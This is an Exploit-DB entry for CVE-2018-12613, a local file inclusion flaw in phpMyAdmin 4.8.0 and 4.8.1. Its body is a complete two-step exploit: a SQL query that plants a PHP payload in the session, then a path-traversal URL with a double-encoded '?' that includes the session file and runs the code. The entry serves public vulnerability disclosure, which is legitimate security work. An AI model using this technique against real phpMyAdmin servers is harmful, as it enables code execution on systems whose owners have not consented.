phpMyAdmin 4.8.1 - Local File Inclusion

EDB-ID: 44928
Author: VulnSpy
Published: 2018-06-22
CVE: CVE-2018-12613
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: 2018-06-21 
 # Exploit Author: VulnSpy 
 # Vendor Homepage: http://www.phpmyadmin.net 
 # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz 
 # Version: 4.8.0, 4.8.1 
 # Tested on: php7 mysql5 
 # CVE : CVE-2018-12613 
  
 1. Run SQL Query : select '<?php phpinfo();exit;?>' 
 2. Include the session file : 
 http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

Source: www.exploit-db.com
Related Posts